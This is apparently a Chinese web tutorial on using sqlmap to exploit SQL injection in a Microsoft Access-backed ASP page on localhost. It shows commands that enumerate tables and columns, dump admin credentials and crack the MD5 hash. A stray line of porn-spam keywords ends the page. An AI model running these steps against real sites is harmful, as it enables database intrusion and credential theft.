<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    SqlMap之Access注入實戰

    (1) 猜解是否能注入

    sqlmap.py -u “http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513"

    SqlMap之Access注入實戰

    it looks like the back-end DBMS is ‘Microsoft Access’. Do you want to skip test payloads specific for other DBMSes? [Y/n]

    它后端DBMS看起來像是“Microsoft Access”。 是否要跳過特定于其他DBMS的測試有效內容

    輸入”Y”。

    SqlMap之Access注入實戰

    GET parameter ‘id’ is vulnerable. Do you want to keep testing the others (if any)?

    GET參數’id’是脆弱的。 你想要繼續測試其他人(如果有的話)

    輸入”Y”。

    SqlMap之Access注入實戰

    猜出來的數據庫是”Microsoft Access”數據庫。

    (2) 猜解表

    sqlmap.py -u “http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" –tables

    SqlMap之Access注入實戰

    do you want to use common table existence check? [Y/n/q]

    是否要使用公共表存在檢查存在? 輸入”Y”

    please enter number of threads? [Enter for 1 (current)] 請輸入線程數? [輸入 1 (當前)]

    然后要你輸入線程數,這里輸入10,線程數不能輸入過大,否則會提示錯誤。

    SqlMap之Access注入實戰

    猜解成功后得出的表。

    (3) 根據猜解的表進行猜解表的字段(假如通過2得到了admin這個表)

    sqlmap.py -u “http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" –columns -T admin

    do you want to use common column existence check? [Y/n/q] 你想使用公共列存在檢查嗎?[Y/n/q]

    輸入”Y”。然后輸入線程數

    一番等待結果就出來了。

    (4) 根據字段猜解內容(假如通過3得到字段為admin和password)

    SqlMap之Access注入實戰

    他會詢問你: do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

    你想存儲的哈希值來與其他工具最終進一步處理臨時文件?

    輸入”Y”;

    然后他又會詢問你: do you want to crack them via a dictionary-based attack? [Y/n/q]

    你想通過基于字典的攻擊來破解他們嗎?

    SqlMap之Access注入實戰

    輸入”N”; 使用它自帶的

    SqlMap之Access注入實戰

    用戶名與密碼就出來了。密碼是MD5加密的: a48e190fafc257d3 放到網上去解密,解密之后得到的結果為

    SqlMap之Access注入實戰

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类